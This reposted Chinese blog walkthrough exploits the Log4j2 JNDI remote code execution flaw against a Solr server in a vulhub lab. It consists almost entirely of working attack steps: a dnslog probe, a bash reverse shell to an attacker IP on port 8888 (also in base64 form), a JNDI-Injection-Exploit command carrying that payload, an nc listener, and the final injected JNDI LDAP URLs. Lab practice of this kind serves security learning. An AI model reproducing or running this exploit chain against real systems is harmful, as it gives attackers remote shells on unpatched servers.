您的位置:首页 > 汽车 > 时评 > 远程代码执行-Log4j2漏洞

远程代码执行-Log4j2漏洞

2025/1/16 3:46:00 来源:https://blog.csdn.net/2401_82451607/article/details/142025773  浏览:    关键词:远程代码执行-Log4j2漏洞

1.在vulhub中打开环境

进入环境所在的文件  打开环境

docker-compose up -d

2.浏览器访问打开环境

3.使用dnslog查看是否存在漏洞

solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9dbu98.dnslog.cn

发现可以返回java版本 说明存在漏洞

4.开始反弹shell

下载jdni放到攻击机

反弹shell

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹shell经过base-64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

5.服务器监听

nc -lvvp 8888

6.使用jdk1.8的payload直接访问

/solr/admin/cores?action=${jndi:ldap://192.168.10.233:1389/o2qeea} ${jndi:ldap://192.168.10.233:8888/uma7pn}

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com